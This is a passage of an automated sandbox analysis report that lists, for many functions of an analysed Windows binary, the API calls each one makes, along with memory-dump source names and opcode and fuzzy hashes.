        • Instruction Fuzzy Hash: 3F515934614645DFCB10DF68C4848ADBBF1FF59324B5481A8E80AAB762DB31EDC6CB90
        APIs
        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00276C33
        • SetWindowLongW.USER32(?,000000EC,?), ref: 00276C4A
        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00276C73
        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0025AB79,00000000,00000000), ref: 00276C98
        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00276CC7
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$Long$MessageSendShow
        • String ID:
        • API String ID: 3688381893-0
        • Opcode ID: 2aa34fe1dcce5a67d62f05abce7b9367d96316749191500b11aa43431abc7fc0
        • Instruction ID: f168466efbb62c4508487b639e8f06919ffb83b8fd8d3efe71a78ae749088191
        • Opcode Fuzzy Hash: 2aa34fe1dcce5a67d62f05abce7b9367d96316749191500b11aa43431abc7fc0
        • Instruction Fuzzy Hash: F541D435624505AFD725CF38CC5CFAA7BA5EB0A360F14826DF89DA72E0C371AD61CA40
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free
        • String ID:
        • API String ID: 269201875-0
        • Opcode ID: 86c38bd80cb9b34b8d2d310e064c2e0f21775af9392d3305d07e93016330d4e1
        • Instruction ID: 2cc3d514b043018f5994da5d6a10c3dfdd5c4d623db97a125722c36c79faf3bb
        • Opcode Fuzzy Hash: 86c38bd80cb9b34b8d2d310e064c2e0f21775af9392d3305d07e93016330d4e1
        • Instruction Fuzzy Hash: DA41D432A10204EFCB24DF78C881A9DB7E5EFA9314F254568F615EB352DB31AD65CB80
        APIs
        • GetCursorPos.USER32(?), ref: 001F9141
        • ScreenToClient.USER32(00000000,?), ref: 001F915E
        • GetAsyncKeyState.USER32(00000001), ref: 001F9183
        • GetAsyncKeyState.USER32(00000002), ref: 001F919D
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AsyncState$ClientCursorScreen
        • String ID:
        • API String ID: 4210589936-0
        • Opcode ID: 19b0437bd5cfe12251d78c4e5fcb567ea67dfcbbcbc40df0782f8f382d4cabb1
        • Instruction ID: 7723f5ced676fffc7ff271875fee0d1030bc54b261d81e406807b07150583153
        • Opcode Fuzzy Hash: 19b0437bd5cfe12251d78c4e5fcb567ea67dfcbbcbc40df0782f8f382d4cabb1
        • Instruction Fuzzy Hash: FD41517191851BEBDF19AF64C848BFEB774FB05334F20822AE569A2290C7705954CF91
        APIs
        • GetInputState.USER32 ref: 002538CB
        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00253922
        • TranslateMessage.USER32(?), ref: 0025394B
        • DispatchMessageW.USER32(?), ref: 00253955
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00253966
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
        • String ID:
        • API String ID: 2256411358-0
        • Opcode ID: 5ff73841f1c207faaefd27bf1583a3402bc995f972affb1477a9eebe794702d6
        • Instruction ID: 5d151c92b56dd1c046391b1348ae73744d98ea6d4e24af78e32465fbfda94d0b
        • Opcode Fuzzy Hash: 5ff73841f1c207faaefd27bf1583a3402bc995f972affb1477a9eebe794702d6
        • Instruction Fuzzy Hash: 2931FBB0528347DEEB35CF34A85DBB637E8AB01382F54155DE856C2090E7F096ACCB15
        APIs
        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0025C21E,00000000), ref: 0025CF38
        • InternetReadFile.WININET(?,00000000,?,?), ref: 0025CF6F
        • GetLastError.KERNEL32(?,00000000,?,?,?,0025C21E,00000000), ref: 0025CFB4
        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0025C21E,00000000), ref: 0025CFC8
        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0025C21E,00000000), ref: 0025CFF2
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
        • String ID:
        • API String ID: 3191363074-0
        • Opcode ID: 712f1d6e1b285e89773cfe2e7eb2d22a084140db06e82a93398a6d85ad6bbf25
        • Instruction ID: 8e7efe7f8c836aba3a72592a5b1e4b1a7251cb3be5f7af312dafde1faa519a50
        • Opcode Fuzzy Hash: 712f1d6e1b285e89773cfe2e7eb2d22a084140db06e82a93398a6d85ad6bbf25
        • Instruction Fuzzy Hash: 7231A071610306EFDB24DFA5D884AABBBF9EF10312B20402FF90AD2511EB30AD55DB64
        APIs
        • GetWindowRect.USER32(?,?), ref: 00241915
        • PostMessageW.USER32(00000001,00000201,00000001), ref: 002419C1
        • Sleep.KERNEL32(00000000,?,?,?), ref: 002419C9
        • PostMessageW.USER32(00000001,00000202,00000000), ref: 002419DA
        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 002419E2
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessagePostSleep$RectWindow
        • String ID:
        • API String ID: 3382505437-0
        • Opcode ID: 14c37ad06f55f97ab76549dcebab8328812c99296f3f6b6b43586fa851195373
        • Instruction ID: d7af7f8904062522808a8214aaadd4a7a01193c1f36002d920e9ba404f9cf2a8
        • Opcode Fuzzy Hash: 14c37ad06f55f97ab76549dcebab8328812c99296f3f6b6b43586fa851195373
        • Instruction Fuzzy Hash: B631A471A1021AEFCB08CFB8DD9DADE7BB5EB44315F104229F925A72D1C77099A4CB90
        APIs
        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00275745
        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0027579D
        • _wcslen.LIBCMT ref: 002757AF
        • _wcslen.LIBCMT ref: 002757BA
        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00275816
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$_wcslen
        • String ID:
        • API String ID: 763830540-0
        • Opcode ID: f2ea028cec47e422c92c66f30f63ab9f1703b5bc15753be5ae4c7190f7ecdcd1
        • Instruction ID: 99f42ec728ee073a25d49b5194eb98d33397153a4cd9062b6554b57441803a79
        • Opcode Fuzzy Hash: f2ea028cec47e422c92c66f30f63ab9f1703b5bc15753be5ae4c7190f7ecdcd1
        • Instruction Fuzzy Hash: C6218471924629DADB209F64DC84AEEF778FF44320F10C216E91D9A1C0D7B089A5CF50
        APIs
        • IsWindow.USER32(00000000), ref: 00260951
        • GetForegroundWindow.USER32 ref: 00260968
        • GetDC.USER32(00000000), ref: 002609A4
        • GetPixel.GDI32(00000000,?,00000003), ref: 002609B0
        • ReleaseDC.USER32(00000000,00000003), ref: 002609E8
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$ForegroundPixelRelease
        • String ID:
        • API String ID: 4156661090-0
        • Opcode ID: 7fad850415f83cac5f77667fd48c40e9053539fcfc4f52f5a612e272e09a4310
        • Instruction ID: 62be9c41a94feb7ccbc79ad01bf4cda40b3dae565aaa1c53ade11a7dfa174bdc
        • Opcode Fuzzy Hash: 7fad850415f83cac5f77667fd48c40e9053539fcfc4f52f5a612e272e09a4310
        • Instruction Fuzzy Hash: 9421A135610204AFD704EF65DC89AAFBBE9EF44701F10842CE84AA7352CB70AD44CB50
        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 0021CDC6
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021CDE9
          • Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0021CE0F
        • _free.LIBCMT ref: 0021CE22
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0021CE31
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
        • String ID:
        • API String ID: 336800556-0
        • Opcode ID: ab70aabc7ede7ec34c64a1242f84e82e01b3abb24e78a21455f2c88e67779d7a
        • Instruction ID: dbba5a234119a9c1b5861d1e78e71f033f38c525fae2c9ac4a4f2a2225f499dc
        • Opcode Fuzzy Hash: ab70aabc7ede7ec34c64a1242f84e82e01b3abb24e78a21455f2c88e67779d7a
        • Instruction Fuzzy Hash: F501FC766512157F23211AB67C4CCBF79EDDFD6BA1335012DFD09C7200DA608DA181B0
        APIs
        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001F9693
        • SelectObject.GDI32(?,00000000), ref: 001F96A2
        • BeginPath.GDI32(?), ref: 001F96B9
        • SelectObject.GDI32(?,00000000), ref: 001F96E2
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ObjectSelect$BeginCreatePath
        • String ID:
        • API String ID: 3225163088-0
        • Opcode ID: 39aad8ef9f1da9230c1233cccf1911d66a62df29f6a90aae719716d91b35cf0c
        • Instruction ID: 5ee3917d01c7b4665748f7fc8ef7e6d471338751f3c79ab0c39f9e54a1e716b6
        • Opcode Fuzzy Hash: 39aad8ef9f1da9230c1233cccf1911d66a62df29f6a90aae719716d91b35cf0c
        • Instruction Fuzzy Hash: 5F214C70802789EBDB11AF64FC2C7B93BA8BB50366F60031AF514A61B0D37098A5CF94
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _memcmp
        • String ID:
        • API String ID: 2931989736-0
        • Opcode ID: 96734a4e3a7589a620b8e9728010063761d6696a0e23c89d3cca6b6687238116
        • Instruction ID: 1da747dfacd625b3041764973bde0118919f4fb473397eb6fc1bc2004a7d4f48
        • Opcode Fuzzy Hash: 96734a4e3a7589a620b8e9728010063761d6696a0e23c89d3cca6b6687238116
        • Instruction Fuzzy Hash: 24019BA16B5615BBD20C96109E41FBAB35C9B25354B004035FD489A183F6B0ED31C6A1
        APIs
        • GetLastError.KERNEL32(75912E40,?,?,0020F2DE,00213863,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00212DFD
        • _free.LIBCMT ref: 00212E32
        • _free.LIBCMT ref: 00212E59
        • SetLastError.KERNEL32(00000000), ref: 00212E66
        • SetLastError.KERNEL32(00000000), ref: 00212E6F
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorLast$_free
        • String ID:
        • API String ID: 3170660625-0
        • Opcode ID: 00c55d0230e33a59ab4f6c063f78a8623e7dccf1607141725c59d30e1ec60330
        • Instruction ID: 888ff702767a64a76f04c47c010532131242b37f71e8a3c0792452b1f98124d9
        • Opcode Fuzzy Hash: 00c55d0230e33a59ab4f6c063f78a8623e7dccf1607141725c59d30e1ec60330
        • Instruction Fuzzy Hash: 1601F932275601E7C6127B347C89DEB25DAABF13B5B300028F819A22D3EE709CFD4460
        APIs
        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?,?,0024035E), ref: 0024002B
        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240046
        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240054
        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?), ref: 00240064
        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240070
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: From$Prog$FreeStringTasklstrcmpi
        • String ID:
        • API String ID: 3897988419-0
        • Opcode ID: 3a252fb00bb2b8e909258808ede1daceff0eff4965a0735f5314f3d1a4e963ad
        • Instruction ID: 058ff987e5dfeac1e80af5be7b53426e78186bfa9b52704504d1bdad9bd76c0a
        • Opcode Fuzzy Hash: 3a252fb00bb2b8e909258808ede1daceff0eff4965a0735f5314f3d1a4e963ad
        • Instruction Fuzzy Hash: E601F272610214BFDB214F78EC88BAA7AEDEF44751F245028FE09D3210D770DE808BA0
        APIs
        • QueryPerformanceCounter.KERNEL32(?), ref: 0024E997
        • QueryPerformanceFrequency.KERNEL32(?), ref: 0024E9A5
        • Sleep.KERNEL32(00000000), ref: 0024E9AD
        • QueryPerformanceCounter.KERNEL32(?), ref: 0024E9B7
        • Sleep.KERNEL32 ref: 0024E9F3
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: PerformanceQuery$CounterSleep$Frequency
        • String ID:
        • API String ID: 2833360925-0
        • Opcode ID: e08e4fd3a702bf6b7fed564a7ef5c34ada0ae138c6c656cc430bc123b1e51607
        • Instruction ID: 5b1ee4ef138ae2e3eca6fe46e85684be60c229e394c579fcb0a252e371c5b519
        • Opcode Fuzzy Hash: e08e4fd3a702bf6b7fed564a7ef5c34ada0ae138c6c656cc430bc123b1e51607
        • Instruction Fuzzy Hash: FE015B31C1152ADBDF049FF5E84DAEDBB78BB08310F51055AE906B2181CB3095A4CB62
        APIs
        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00241114
        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241120
        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 0024112F
        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241136
        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0024114D
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
        • String ID:
        • API String ID: 842720411-0
        • Opcode ID: 1c6c0125b645377ba70f25f850100d7acfca0c7ed21384fc59c9a5654df0cf98
        • Instruction ID: 5dfb7b18326306426db32e37975edfd09bd69fbbf81aed6fc2a37580ec3d5e83
        • Opcode Fuzzy Hash: 1c6c0125b645377ba70f25f850100d7acfca0c7ed21384fc59c9a5654df0cf98
        • Instruction Fuzzy Hash: 52011975200206BFDB154FA5EC4DA6A3B6EEF893A1B204429FA49D7360DA31DC909A60
        APIs
        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00240FCA
        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00240FD6
        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00240FE5
        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00240FEC
        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00241002
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: HeapInformationToken$AllocErrorLastProcess
        • String ID:
        • API String ID: 44706859-0
        • Opcode ID: 72871469708fdfd2ee9716e2909c6e4abd60ce77514fc2fbd8e1ded4d9b07c7f
        • Instruction ID: 40475bc5776333aa30569bfd6fc434daf93fb72a2d4aa1cba6fa2bcf18035fc1
        • Opcode Fuzzy Hash: 72871469708fdfd2ee9716e2909c6e4abd60ce77514fc2fbd8e1ded4d9b07c7f
        • Instruction Fuzzy Hash: 01F04935200312ABDB215FB4AC4DF563FADEF89762F604428FA4DD6251CA70DCA08A60
        APIs
        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0024102A
        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00241036
        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241045
        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0024104C
        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241062
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: HeapInformationToken$AllocErrorLastProcess
        • String ID:
        • API String ID: 44706859-0
        • Opcode ID: db2974789d52249872c47c770fb2046b8ebf155d4a634e444476624a5dc4cd1a
        • Instruction ID: b169f48817f54c75d5a2ab2dbb2d811e718b76a098e8c1cb3df9d033ba32c8cf
        • Opcode Fuzzy Hash: db2974789d52249872c47c770fb2046b8ebf155d4a634e444476624a5dc4cd1a
        • Instruction Fuzzy Hash: 09F06D35200312EBDB215FB4EC4DF563BADEF89B61F200428FE4DD7250CA70D8A08A60
        APIs
        • _free.LIBCMT ref: 0021D752
          • Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
          • Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0
        • _free.LIBCMT ref: 0021D764
        • _free.LIBCMT ref: 0021D776
        • _free.LIBCMT ref: 0021D788
        • _free.LIBCMT ref: 0021D79A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
